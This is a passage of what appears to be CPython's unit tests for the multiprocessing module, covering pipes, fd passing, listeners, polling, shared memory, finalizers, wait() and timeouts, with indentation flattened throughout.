self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
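        # os.fstat() fails with EBADF for unassigned descriptors; any other
        # error is propagated.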
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
    def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
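        # For each family: create a Listener, report its address to the
        # parent, then send the accepted Connection object itself back over
        # the pipe.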
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
        # Make a pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
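        # Consecutive (sorted) blocks must tile each arena: either the next
        # block opens a new arena at offset 0, or it starts exactly where the
        # previous block stopped.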
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
